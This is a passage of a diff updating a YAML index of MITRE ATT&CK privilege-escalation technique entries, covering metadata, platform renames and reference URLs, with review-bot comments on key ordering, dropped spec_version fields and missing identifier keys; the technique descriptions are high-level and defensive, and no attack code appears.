Adversaries may abuse security support providers (SSPs) to execute DLLs when the system boots. Windows SSP DLLs are loaded into the Local Security Authority (LSA) process at system start. Once loaded into the LSA, SSP DLLs have access to encrypted and plaintext passwords that are stored in Windows, such as any logged-on user's Domain password or smart card PINs.
@@ -17600,13 +17928,11 @@ privilege-escalation:
- 'Windows Registry: Windows Registry Key Modification'
x_mitre_permissions_required:
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1547.005
atomic_tests: []
T1543.004:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:48.453Z'
name: 'Create or Modify System Process: Launch Daemon'
description: |-
Adversaries may create or modify Launch Daemons to execute malicious payloads as part of persistence. Launch Daemons are plist files used to interact with Launchd, the service management framework used by macOS. Launch Daemons require elevated privileges to install, are executed for every user on a system prior to login, and run in the background without the need for user interaction. During the macOS initialization startup, the launchd process loads the parameters for launch-on-demand system-level daemons from plist files found in /System/Library/LaunchDaemons/
and /Library/LaunchDaemons/
. Required Launch Daemons parameters include a Label
to identify the task, Program
to provide a path to the executable, and RunAtLoad
to specify when the task is run. Launch Daemons are often used to provide access to shared resources, updates to software, or conduct automation tasks.(Citation: AppleDocs Launch Agent Daemons)(Citation: Methods of Mac Malware Persistence)(Citation: launchd Keywords for plists)
@@ -17683,12 +18009,11 @@ privilege-escalation:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
identifier: T1543.004
atomic_tests: []
T1574.008:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-09-12T15:25:57.059Z'
name: 'Hijack Execution Flow: Path Interception by Search Order Hijacking'
description: |-
Adversaries may execute their own malicious payloads by hijacking the search order used to load other programs. Because some programs do not call other programs using the full path, adversaries may place their own file in the directory where the calling program is located, causing the operating system to launch their malicious software at the request of the calling program.
@@ -17707,6 +18032,7 @@ privilege-escalation:
phase_name: defense-evasion
x_mitre_contributors:
- Stefan Kanthak
+ x_mitre_deprecated: false
x_mitre_detection: |
Monitor file creation for files named after partial directories and in locations that may be searched for common processes through the environment variable, or otherwise should not be user writable. Monitor the executing process for process executable paths that are named for partial directories. Monitor file creation for programs that are named after Windows system programs or programs commonly executed without a path (such as "findstr," "net," and "python"). If this activity occurs outside of known administration activity, upgrades, installations, or patches, then it may be suspicious.
@@ -17714,7 +18040,6 @@ privilege-escalation:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '1.0'
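Review bot: `x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5` is deleted at this position only to be re-inserted lower in the same T1574.008 object (directly after `x_mitre_attack_spec_version: 3.2.0` in the following hunk), so the net effect is a key reorder rather than a data change. If the generator serialised keys in a stable, sorted order, regenerations would only diff on real content and hunks like this one would disappear.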
@@ -17734,34 +18059,36 @@ privilege-escalation:
id: attack-pattern--58af3705-8740-4c68-9329-ec015a7013c2
created: '2020-03-13T17:48:58.999Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1574/008
external_id: T1574.008
+ - source_name: Microsoft Environment Property
+ description: Microsoft. (2011, October 24). Environment Property. Retrieved
+ July 27, 2016.
+ url: https://docs.microsoft.com/en-us/previous-versions//fd7hxfdd(v=vs.85)?redirectedfrom=MSDN
- source_name: Microsoft CreateProcess
- description: Microsoft. (n.d.). CreateProcess function. Retrieved December
- 5, 2014.
- url: http://msdn.microsoft.com/en-us/library/ms682425
+ description: Microsoft. (n.d.). CreateProcess function. Retrieved September
+ 12, 2024.
+ url: https://learn.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-createprocessa
+ - source_name: Microsoft WinExec
+ description: Microsoft. (n.d.). WinExec function. Retrieved September 12,
+ 2024.
+ url: https://learn.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-winexec
- source_name: Windows NT Command Shell
description: Tim Hill. (2014, February 2). The Windows NT Command Shell. Retrieved
December 5, 2014.
url: https://docs.microsoft.com/en-us/previous-versions//cc723564(v=technet.10)?redirectedfrom=MSDN#XSLTsection127121120120
- - source_name: Microsoft WinExec
- description: Microsoft. (n.d.). WinExec function. Retrieved December 5, 2014.
- url: http://msdn.microsoft.com/en-us/library/ms687393
- - source_name: Microsoft Environment Property
- description: Microsoft. (2011, October 24). Environment Property. Retrieved
- July 27, 2016.
- url: https://docs.microsoft.com/en-us/previous-versions//fd7hxfdd(v=vs.85)?redirectedfrom=MSDN
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1574.008
atomic_tests: []
T1484.001:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-09-23T22:11:01.884Z'
name: 'Domain Policy Modification: Group Policy Modification'
description: "Adversaries may modify Group Policy Objects (GPOs) to subvert
the intended discretionary access controls for a domain, usually with the
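Review bot: `spec_version: '2.1'` is dropped from T1574.008 here, and the same removal is applied to every technique object in this diff while `x_mitre_attack_spec_version` is bumped to 3.2.0. `spec_version` is a required common property on STIX 2.1 domain objects, so any tooling that validates or round-trips these `technique:` blocks as STIX will start rejecting them; if the index is intended as a non-STIX projection of the bundle that is acceptable, but it should be stated next to the generator so downstream consumers are not surprised. On the `external_references` changes: the `Microsoft Environment Property` and `Microsoft WinExec` entries are only moved within the list (WinExec additionally gets the new `learn.microsoft.com` URL and a September 12, 2024 retrieval date), so most of the churn in this hunk is ordering; the only substantive reference edits are the CreateProcess and WinExec URL updates and the new `revoked: false` key.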
@@ -17797,6 +18124,10 @@ privilege-escalation:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
+ x_mitre_contributors:
+ - Itamar Mizrahi, Cymptom
+ - Tristan Bennett, Seamless Intelligence
+ x_mitre_deprecated: false
x_mitre_detection: |-
It is possible to detect GPO modifications by monitoring directory service changes using Windows event logs. Several events may be logged for such GPO modifications, including:
@@ -17808,16 +18139,12 @@ privilege-escalation:
GPO abuse will often be accompanied by some other behavior such as [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053), which will have events associated with it to detect. Subsequent permission value modifications, like those to SeEnableDelegationPrivilege, can also be searched for in events associated with privileges assigned to new logons (Event ID 4672) and assignment of user rights (Event ID 4704).
- x_mitre_platforms:
- - Windows
- x_mitre_is_subtechnique: true
- x_mitre_deprecated: false
x_mitre_domains:
- enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Windows
x_mitre_version: '1.0'
- x_mitre_contributors:
- - Itamar Mizrahi, Cymptom
- - Tristan Bennett, Seamless Intelligence
x_mitre_data_sources:
- 'Command: Command Execution'
- 'Active Directory: Active Directory Object Creation'
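Review bot: this hunk and the preceding one are a pure key reorder for T1484.001: `x_mitre_platforms` (`- Windows`), `x_mitre_is_subtechnique: true`, `x_mitre_deprecated: false` and the two `x_mitre_contributors` entries (`Itamar Mizrahi, Cymptom`, `Tristan Bennett, Seamless Intelligence`) are removed here with exactly the values that were added above. Net content is unchanged, which makes the real edits to this object (the `modified` bump to 2024-09-23 and the 3.2.0 spec version) harder to spot; a deterministic key order in the generator would keep future diffs to actual data changes.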
@@ -17853,12 +18180,12 @@ privilege-escalation:
url: https://wald0.com/?p=179
- source_name: Harmj0y Abusing GPO Permissions
description: Schroeder, W. (2016, March 17). Abusing GPO Permissions. Retrieved
- March 5, 2019.
- url: http://www.harmj0y.net/blog/redteaming/abusing-gpo-permissions/
+ September 23, 2024.
+ url: https://blog.harmj0y.net/redteaming/abusing-gpo-permissions/
- source_name: Harmj0y SeEnableDelegationPrivilege Right
description: Schroeder, W. (2017, January 10). The Most Dangerous User Right
- You (Probably) Have Never Heard Of. Retrieved March 5, 2019.
- url: http://www.harmj0y.net/blog/activedirectory/the-most-dangerous-user-right-you-probably-have-never-heard-of/
+ You (Probably) Have Never Heard Of. Retrieved September 23, 2024.
+ url: https://blog.harmj0y.net/activedirectory/the-most-dangerous-user-right-you-probably-have-never-heard-of/
- source_name: TechNet Group Policy Basics
description: 'srachui. (2012, February 13). Group Policy Basics – Part 1:
Understanding the Structure of a Group Policy Object. Retrieved March 5,
@@ -17866,14 +18193,13 @@ privilege-escalation:
url: https://blogs.technet.microsoft.com/musings_of_a_technical_tam/2012/02/13/group-policy-basics-part-1-understanding-the-structure-of-a-group-policy-object/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1484.001
atomic_tests: []
T1078.001:
technique:
- modified: '2024-03-07T14:27:04.770Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: 'Valid Accounts: Default Accounts'
description: |-
Adversaries may obtain and abuse credentials of a default account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Default accounts are those that are built-into an OS, such as the Guest or Administrator accounts on Windows systems. Default accounts also include default factory/provider set accounts on other types of systems, software, or devices, including the root user account in AWS and the default service account in Kubernetes.(Citation: Microsoft Local Accounts Feb 2019)(Citation: AWS Root User)(Citation: Threat Matrix for Kubernetes)
@@ -17888,6 +18214,7 @@ privilege-escalation:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: initial-access
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_deprecated: false
x_mitre_detection: Monitor whether default accounts have been activated or logged
into. These audits should also include checks on any appliances and applications
@@ -17896,18 +18223,18 @@ privilege-escalation:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- SaaS
- IaaS
- Linux
- macOS
- - Google Workspace
- Containers
- Network
- x_mitre_version: '1.3'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Logon Session: Logon Session Creation'
- 'User Account: User Account Authentication'
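Review bot: T1078.001's platform list replaces `Azure AD`, `Office 365` and `Google Workspace` with `Office Suite` and `Identity Provider` (with the `x_mitre_version` bump from 1.3 to 1.4), and the same substitution is applied to T1548, T1548.005, T1098.005 and T1098.001 below. Any consumer that filters this index on the old platform strings, including per-platform index files derived from it, will silently stop matching these techniques, so please verify that every derived index in this PR is regenerated from the same bundle rather than left carrying the old platform names. `x_mitre_modified_by_ref` is also re-inserted here at a new position, the same ordering churn seen elsewhere in the diff.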
@@ -17939,9 +18266,6 @@ privilege-escalation:
url: https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1078.001
atomic_tests: []
T1547.003:
@@ -18013,7 +18337,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1547.003
atomic_tests: []
T1546.005:
@@ -18040,7 +18363,7 @@ privilege-escalation:
url: https://bash.cyberciti.biz/guide/Trap_statement
description: Cyberciti. (2016, March 29). Trap statement. Retrieved May 21,
2019.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-24T16:43:02.273Z'
name: 'Event Triggered Execution: Trap'
description: |-
Adversaries may establish persistence by executing malicious content triggered by an interrupt signal. The trap
command allows programs and shells to specify commands that will be executed upon receiving interrupt signals. A common situation is a script allowing for graceful termination and handling of common keyboard interrupts like ctrl+c
and ctrl+d
.
@@ -18066,13 +18389,11 @@ privilege-escalation:
x_mitre_permissions_required:
- User
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1546.005
atomic_tests: []
T1574.006:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:40.146Z'
name: 'Hijack Execution Flow: LD_PRELOAD'
description: "Adversaries may execute their own malicious payloads by hijacking
environment variables the dynamic linker uses to load shared libraries. During
@@ -18193,12 +18514,11 @@ privilege-escalation:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
identifier: T1574.006
atomic_tests: []
T1548:
technique:
- modified: '2024-04-15T20:52:09.908Z'
+ modified: '2024-10-15T15:32:21.811Z'
name: Abuse Elevation Control Mechanism
description: 'Adversaries may circumvent mechanisms designed to control elevate
privileges to gain higher-level permissions. Most modern systems contain native
@@ -18230,11 +18550,10 @@ privilege-escalation:
- Linux
- macOS
- Windows
- - Office 365
- IaaS
- - Google Workspace
- - Azure AD
- x_mitre_version: '1.3'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Process: Process Creation'
- 'User Account: User Account Modification'
@@ -18275,11 +18594,10 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1134.002:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-11T21:14:37.714Z'
name: Create Process with Token
description: |-
Adversaries may create a new process with an existing token to escalate privileges and bypass access controls. Processes can be created with the token and resulting security context of another user using features such as CreateProcessWithTokenW
and runas
.(Citation: Microsoft RunAs)
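Review bot: T1548's object tail in this hunk goes straight from the removed `spec_version: '2.1'` to `atomic_tests: []` with no `identifier:` line, whereas every neighbouring object that shows its tail (T1134.002 here, T1547.003, T1548.001, T1547.004, T1098.004 nearby) has `identifier: <technique id>` immediately before `atomic_tests: []`. T1548.005, T1098.005, T1055.013, T1574.005 and T1134.003 show the same gap further down. Please confirm whether the `identifier` key for those objects sits elsewhere in the block or is genuinely missing; if it is missing, consumers that look entries up by `identifier` will miss exactly the techniques without sub-technique suffixes.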
@@ -18335,12 +18653,11 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1134.002
atomic_tests: []
T1548.001:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-15T18:43:20.995Z'
name: 'Abuse Elevation Control Mechanism: Setuid and Setgid'
description: |-
An adversary may abuse configurations where an application has the setuid or setgid bits set in order to get code running in a different (and possibly more privileged) user’s context. On Linux or macOS, when the setuid or setgid bits are set for an application binary, the application will run with the privileges of the owning user or group respectively.(Citation: setuid man page) Normally an application is run in the current user’s context, regardless of which user or group owns the application. However, there are instances where programs need to be executed in an elevated context to function properly, but the user running them may not have the specific required privileges.
@@ -18397,7 +18714,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1548.001
atomic_tests: []
T1547.004:
@@ -18467,7 +18783,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1547.004
atomic_tests: []
T1098.004:
@@ -18577,7 +18892,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1098.004
atomic_tests: []
T1546.012:
@@ -18631,7 +18945,7 @@ privilege-escalation:
description: Symantec. (2008, June 28). Trojan.Ushedix. Retrieved December
18, 2017.
source_name: Symantec Ushedix June 2008
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2020-11-10T18:29:31.112Z'
name: 'Event Triggered Execution: Image File Execution Options Injection'
description: |-
Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by Image File Execution Options (IFEO) debuggers. IFEOs enable a developer to attach a debugger to an application. When a process is created, a debugger present in an application’s IFEO will be prepended to the application’s name, effectively launching the new process under the debugger (e.g., C:\dbg\ntsd.exe -g notepad.exe
). (Citation: Microsoft Dev Blog IFEO Mar 2010)
@@ -18664,13 +18978,11 @@ privilege-escalation:
x_mitre_permissions_required:
- Administrator
- SYSTEM
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1546.012
atomic_tests: []
T1548.005:
technique:
- modified: '2024-03-28T15:30:09.313Z'
+ modified: '2024-10-15T16:07:49.519Z'
name: Temporary Elevated Cloud Access
description: "Adversaries may abuse permission configurations that allow them
to gain temporarily elevated access to cloud resources. Many cloud environments
@@ -18732,10 +19044,9 @@ privilege-escalation:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- IaaS
- - Azure AD
- - Office 365
- - Google Workspace
- x_mitre_version: '1.1'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'User Account: User Account Modification'
type: attack-pattern
@@ -18793,7 +19104,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1055.013:
technique:
@@ -18835,7 +19145,7 @@ privilege-escalation:
description: Microsoft. (n.d.). PsSetCreateProcessNotifyRoutine routine. Retrieved
December 20, 2017.
source_name: Microsoft PsSetCreateProcessNotifyRoutine routine
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-02-09T15:43:48.848Z'
name: Process Doppelgänging
description: "Adversaries may inject malicious code into process via process
doppelgänging in order to evade process-based defenses as well as possibly
@@ -18894,8 +19204,6 @@ privilege-escalation:
- Administrator
- SYSTEM
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1574.005:
technique:
@@ -18925,7 +19233,7 @@ privilege-escalation:
description: 'Stefan Kanthak. (2015, December 8). Executable installers are
vulnerable^WEVIL (case 7): 7z*.exe allows remote code execution with escalation
of privilege. Retrieved December 4, 2014.'
- modified: '2020-10-27T14:49:39.188Z'
+ modified: '2020-03-26T19:20:23.030Z'
name: Executable Installer File Permissions Weakness
description: |-
Adversaries may execute their own malicious payloads by hijacking the binaries used by an installer. These processes may automatically execute specific binaries as part of their functionality or to perform other actions. If the permissions on the file system directory containing a target binary, or permissions on the binary itself, are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process. If the original process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions, which could include SYSTEM.
@@ -18960,12 +19268,10 @@ privilege-escalation:
- Administrator
- User
- SYSTEM
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1546.008:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-21T12:33:18.602Z'
name: 'Event Triggered Execution: Accessibility Features'
description: |-
Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by accessibility features. Windows contains accessibility features that may be launched with a key combination before a user has logged in (ex: when the user is on the Windows logon screen). An adversary can modify the way these programs are launched to get a command prompt or backdoor without logging in to the system.
@@ -19042,7 +19348,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1546.008
atomic_tests: []
T1055.004:
@@ -19081,7 +19386,7 @@ privilege-escalation:
A Technical Survey Of Common And Trending Process Injection Techniques.
Retrieved December 7, 2017.'
source_name: Elastic Process Injection July 2017
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-18T12:23:46.476Z'
name: 'Process Injection: Asynchronous Procedure Call'
description: "Adversaries may inject malicious code into processes via the asynchronous
procedure call (APC) queue in order to evade process-based defenses as well
@@ -19130,8 +19435,6 @@ privilege-escalation:
x_mitre_defense_bypassed:
- Application control
- Anti-virus
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1055.004
atomic_tests: []
T1546.009:
@@ -19163,7 +19466,7 @@ privilege-escalation:
description: Microsoft. (2007, October 24). Windows Sysinternals - AppCertDlls.
Retrieved December 18, 2017.
source_name: Sysinternals AppCertDlls Oct 2007
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2020-11-10T18:29:31.052Z'
name: 'Event Triggered Execution: AppCert DLLs'
description: "Adversaries may establish persistence and/or elevate privileges
by executing malicious content triggered by AppCert DLLs loaded into processes.
@@ -19211,13 +19514,11 @@ privilege-escalation:
x_mitre_effective_permissions:
- Administrator
- SYSTEM
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1546.009
atomic_tests: []
T1098.005:
technique:
- modified: '2023-10-03T17:38:39.065Z'
+ modified: '2024-09-25T20:39:53.597Z'
name: Device Registration
description: "Adversaries may register a device to an adversary-controlled account.
Devices may be registered in a multifactor authentication (MFA) system, which
@@ -19230,16 +19531,16 @@ privilege-escalation:
FireEye SolarWinds) In some cases, the MFA self-enrollment process may require
only a username and password to enroll the account's first device or to enroll
a device to an inactive account. (Citation: Mandiant APT29 Microsoft 365 2022)\n\nSimilarly,
- an adversary with existing access to a network may register a device to Azure
- AD and/or its device management system, Microsoft Intune, in order to access
+ an adversary with existing access to a network may register a device to Entra
+ ID and/or its device management system, Microsoft Intune, in order to access
sensitive data or resources while bypassing conditional access policies.(Citation:
AADInternals - Device Registration)(Citation: AADInternals - Conditional Access
- Bypass)(Citation: Microsoft DEV-0537) \n\nDevices registered in Azure AD may
+ Bypass)(Citation: Microsoft DEV-0537) \n\nDevices registered in Entra ID may
be able to conduct [Internal Spearphishing](https://attack.mitre.org/techniques/T1534)
campaigns via intra-organizational emails, which are less likely to be treated
as suspicious by the email client.(Citation: Microsoft - Device Registration)
Additionally, an adversary may be able to perform a [Service Exhaustion Flood](https://attack.mitre.org/techniques/T1499/002)
- on an Azure AD tenant by registering a large number of devices.(Citation:
+ on an Entra ID tenant by registering a large number of devices.(Citation:
AADInternals - BPRT)"
kill_chain_phases:
- kill_chain_name: mitre-attack
@@ -19251,16 +19552,16 @@ privilege-escalation:
- Mike Moran
- Joe Gumke, U.S. Bank
- Arad Inbar, Fidelis Security
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_platforms:
- - Azure AD
- Windows
- - SaaS
- x_mitre_version: '1.2'
+ - Identity Provider
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
- 'Active Directory: Active Directory Object Creation'
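Review bot: T1098.005's platform list drops `SaaS` along with `Azure AD` and only adds `Identity Provider`, while T1098.001 further down keeps `- SaaS` as unchanged context next to its own `Azure AD` to `Identity Provider` swap. The `x_mitre_version` bump from 1.2 to 1.3 suggests this is an upstream content change rather than a generator artifact, but it is the only platform-rename hunk in the diff that removes a platform without a replacement, so it is worth confirming against the source bundle before merging.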
@@ -19315,7 +19616,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1055.002:
technique:
@@ -19338,7 +19638,7 @@ privilege-escalation:
A Technical Survey Of Common And Trending Process Injection Techniques.
Retrieved December 7, 2017.'
source_name: Elastic Process Injection July 2017
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-18T12:21:11.178Z'
name: 'Process Injection: Portable Executable Injection'
description: "Adversaries may inject portable executables (PE) into processes
in order to evade process-based defenses as well as possibly elevate privileges.
@@ -19382,8 +19682,6 @@ privilege-escalation:
- Application control
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1055.002
atomic_tests: []
T1547.015:
@@ -19460,7 +19758,7 @@ privilege-escalation:
url: https://developer.apple.com/library/archive/documentation/General/Reference/InfoPlistKeyReference/Articles/LaunchServicesKeys.html#//apple_ref/doc/uid/TP40009250-SW1
description: Apple. (2018, June 4). Launch Services Keys. Retrieved October
5, 2021.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-18T16:36:37.042Z'
name: 'Boot or Logon Autostart Execution: Login Items'
description: |-
Adversaries may add login items to execute upon user login to gain persistence or escalate privileges. Login items are applications, documents, folders, or server connections that are automatically launched when a user logs in.(Citation: Open Login Items Apple) Login items can be added via a shared file list or Service Management Framework.(Citation: Adding Login Items) Shared file list login items can be set using scripting languages such as [AppleScript](https://attack.mitre.org/techniques/T1059/002), whereas the Service Management Framework uses the API call SMLoginItemSetEnabled
.
@@ -19488,8 +19786,6 @@ privilege-escalation:
- 'File: File Modification'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1547.015
atomic_tests: []
T1134.001:
@@ -19548,23 +19844,22 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1134.001
atomic_tests: []
T1098.001:
technique:
- modified: '2024-02-28T14:35:00.862Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: 'Account Manipulation: Additional Cloud Credentials'
description: "Adversaries may add adversary-controlled credentials to a cloud
account to maintain persistent access to victim accounts and instances within
the environment.\n\nFor example, adversaries may add credentials for Service
Principals and Applications in addition to existing legitimate credentials
- in Azure AD.(Citation: Microsoft SolarWinds Customer Guidance)(Citation: Blue
- Cloud of Death)(Citation: Blue Cloud of Death Video) These credentials include
- both x509 keys and passwords.(Citation: Microsoft SolarWinds Customer Guidance)
- With sufficient permissions, there are a variety of ways to add credentials
- including the Azure Portal, Azure command line interface, and Azure or Az
- PowerShell modules.(Citation: Demystifying Azure AD Service Principals)\n\nIn
+ in Azure / Entra ID.(Citation: Microsoft SolarWinds Customer Guidance)(Citation:
+ Blue Cloud of Death)(Citation: Blue Cloud of Death Video) These credentials
+ include both x509 keys and passwords.(Citation: Microsoft SolarWinds Customer
+ Guidance) With sufficient permissions, there are a variety of ways to add
+ credentials including the Azure Portal, Azure command line interface, and
+ Azure or Az PowerShell modules.(Citation: Demystifying Azure AD Service Principals)\n\nIn
infrastructure-as-a-service (IaaS) environments, after gaining access through
[Cloud Accounts](https://attack.mitre.org/techniques/T1078/004), adversaries
may generate or import their own SSH keys using either the CreateKeyPair
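Review bot: a thirteen-character wording change (`Azure AD` to `Azure / Entra ID`) rewrites six lines here because T1098.001's description is emitted as a double-quoted YAML scalar that is re-wrapped at about 80 columns, with paragraph breaks encoded as `\n\n`. Other objects in this same file use literal block scalars (`description: |-` on T1543.004, T1078.001 and T1548.001, for example), which keep one source line per paragraph and give line-stable diffs. Emitting every description in the block style would make upstream wording changes reviewable at a glance.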
@@ -19574,11 +19869,15 @@ privilege-escalation:
usage of the compromised cloud accounts.(Citation: Expel IO Evil in AWS)(Citation:
Expel Behind the Scenes)\n\nAdversaries may also use the CreateAccessKey
API in AWS or the gcloud iam service-accounts keys create
command
- in GCP to add access keys to an account. If the target account has different
- permissions from the requesting account, the adversary may also be able to
- escalate their privileges in the environment (i.e. [Cloud Accounts](https://attack.mitre.org/techniques/T1078/004)).(Citation:
+ in GCP to add access keys to an account. Alternatively, they may use the CreateLoginProfile
+ API in AWS to add a password that can be used to log into the AWS Management
+ Console for [Cloud Service Dashboard](https://attack.mitre.org/techniques/T1538).(Citation:
+ Permiso Scattered Spider 2023)(Citation: Lacework AI Resource Hijacking 2024)
+ If the target account has different permissions from the requesting account,
+ the adversary may also be able to escalate their privileges in the environment
+ (i.e. [Cloud Accounts](https://attack.mitre.org/techniques/T1078/004)).(Citation:
Rhino Security Labs AWS Privilege Escalation)(Citation: Sysdig ScarletEel
- 2.0) For example, in Azure AD environments, an adversary with the Application
+ 2.0) For example, in Entra ID environments, an adversary with the Application
Administrator role can add a new set of credentials to their application's
service principal. In doing so the adversary would be able to access the service
principal’s roles and permissions, which may be different from those of the
@@ -19589,12 +19888,19 @@ privilege-escalation:
tied to the permissions of the original user account. These temporary credentials
may remain valid for the duration of their lifetime even if the original account’s
API credentials are deactivated.\n(Citation: Crowdstrike AWS User Federation
- Persistence)"
+ Persistence)\n\nIn Entra ID environments with the app password feature enabled,
+ adversaries may be able to add an app password to a user account.(Citation:
